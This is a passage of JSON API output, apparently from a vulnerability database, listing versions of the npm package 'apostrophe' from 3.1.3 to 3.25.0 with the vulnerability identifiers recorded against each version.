539505?format=json","purl":"pkg:npm/apostrophe@3.1.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.1.3"},{"url":"http://public2.vulnerablecode.io/api/packages/539506?format=json","purl":"pkg:npm/apostrophe@3.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539507?format=json","purl":"pkg:npm/apostrophe@3.3.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.3.0"},{"url":"http://public2.vulnerablecode.io/api/packages/59493?format=json","purl":"pkg:npm/apostrophe@3.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.3.1"},{"url":"http://public2.vulnerablecode.io/api/packages/59494?format=json","purl":"pkg:npm/apostrophe@3.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988920?format=json","purl":"pkg:npm/apostrophe@3.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.4.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988921?format=json","purl":"pkg:npm/apostrophe@3.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.5.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988922?format=json","purl":"pkg:npm/apostrophe@3.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.6.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988923?format=json","purl":"pkg:npm/apostrophe@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.7.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988924?format=json","purl":"pkg:npm/apostrophe@3.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988925?format=json","purl":"pkg:npm/apostrophe@3.8.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.8.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988926?format=json","purl":"pkg:npm/apostrophe@3.9.0-prerelease-2021-12-22-001","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.9.0-prerelease-2021-12-22-001"},{"url":"http://public2.vulnerablecode.io/api/packages/988927?format=json","purl":"pkg:npm/apostrophe@3.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988928?format=json","purl":"pkg:npm/apostrophe@3.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.10.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988929?format=json","purl":"pkg:npm/apostrophe@3.11.0-alpha.2022-01-20-001","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.11.0-alpha.2022-01-20-001"},{"url":"http://public2.vulnerablecode.io/api/packages/988930?format=json","purl":"pkg:npm/apostrophe@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988931?format=json","purl":"pkg:npm/apostrophe@3.12.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.12.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988932?format=json","purl":"pkg:npm/apostrophe@3.13.0-alpha.2022-02-04-001","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.13.0-alpha.2022-02-04-001"},{"url":"http://public2.vulnerablecode.io/api/packages/988933?format=json","purl":"pkg:npm/apostrophe@3.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.13.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988934?format=json","purl":"pkg:npm/apostrophe@3.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.14.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988935?format=json","purl":"pkg:npm/apostrophe@3.14.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.14.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988936?format=json","purl":"pkg:npm/apostrophe@3.14.2-alpha.20220401","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.14.2-alpha.20220401"},{"url":"http://public2.vulnerablecode.io/api/packages/988937?format=json","purl":"pkg:npm/apostrophe@3.14.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.14.2"},{"url":"http://public2.vulnerablecode.io/api/packages/988938?format=json","purl":"pkg:npm/apostrophe@3.15.0-alpha.20220317","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.15.0-alpha.20220317"},{"url":"http://public2.vulnerablecode.io/api/packages/988939?format=json","purl":"pkg:npm/apostrophe@3.15.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.15.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988940?format=json","purl":"pkg:npm/apostrophe@3.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.16.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988941?format=json","purl":"pkg:npm/apostrophe@3.16.1-alpha.20210331","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.16.1-alpha.20210331"},{"url":"http://public2.vulnerablecode.io/api/packages/61359?format=json","purl":"pkg:npm/apostrophe@3.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"},{"vulnerability":"VCID-y2wc-ug1j-27cx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.16.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988942?format=json","purl":"pkg:npm/apostrophe@3.17.0-alpha.2022050201","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.17.0-alpha.2022050201"},{"url":"http://public2.vulnerablecode.io/api/packages/988943?format=json","purl":"pkg:npm/apostrophe@3.17.0-alpha.2022-04-18-01","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.17.0-alpha.2022-04-18-01"},{"url":"http://public2.vulnerablecode.io/api/packages/61360?format=json","purl":"pkg:npm/apostrophe@3.17.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.17.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988944?format=json","purl":"pkg:npm/apostrophe@3.18.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.18.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988945?format=json","purl":"pkg:npm/apostrophe@3.18.1-alpha.2022051001","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.18.1-alpha.2022051001"},{"url":"http://public2.vulnerablecode.io/api/packages/988946?format=json","purl":"pkg:npm/apostrophe@3.18.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.18.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988947?format=json","purl":"pkg:npm/apostrophe@3.19.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.19.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988948?format=json","purl":"pkg:npm/apostrophe@3.20.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.20.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988949?format=json","purl":"pkg:npm/apostrophe@3.20.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.20.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988950?format=json","purl":"pkg:npm/apostrophe@3.21.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.21.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988951?format=json","purl":"pkg:npm/apostrophe@3.21.1-alpha.2022060701","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.21.1-alpha.2022060701"},{"url":"http://public2.vulnerablecode.io/api/packages/988952?format=json","purl":"pkg:npm/apostrophe@3.21.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.21.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988953?format=json","purl":"pkg:npm/apostrophe@3.22.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.22.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988954?format=json","purl":"pkg:npm/apostrophe@3.22.1-alpha.2022062101","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.22.1-alpha.2022062101"},{"url":"http://public2.vulnerablecode.io/api/packages/988955?format=json","purl":"pkg:npm/apostrophe@3.22.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.22.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988956?format=json","purl":"pkg:npm/apostrophe@3.23.0-alpha.2022070601","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.23.0-alpha.2022070601"},{"url":"http://public2.vulnerablecode.io/api/packages/988957?format=json","purl":"pkg:npm/apostrophe@3.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988958?format=json","purl":"pkg:npm/apostrophe@3.24.0-alpha.2022071801","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.24.0-alpha.2022071801"},{"url":"http://public2.vulnerablecode.io/api/packages/988959?format=json","purl":"pkg:npm/apostrophe@3.24.0-alpha.2022072001","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.24.0-alpha.2022072001"},{"url":"http://public2.vulnerablecode.io/api/packages/988960?format=json","purl":"pkg:npm/apostrophe@3.24.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.24.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988961?format=json","purl":"pkg:npm/apostrophe@3.25.0-alpha.2022080101","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.25.0-alpha.2022080101"},{"url":"http://public2.vulnerablecode.io/api/packages/988962?format=json","purl":"pkg:npm/apostrophe@3.25.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerab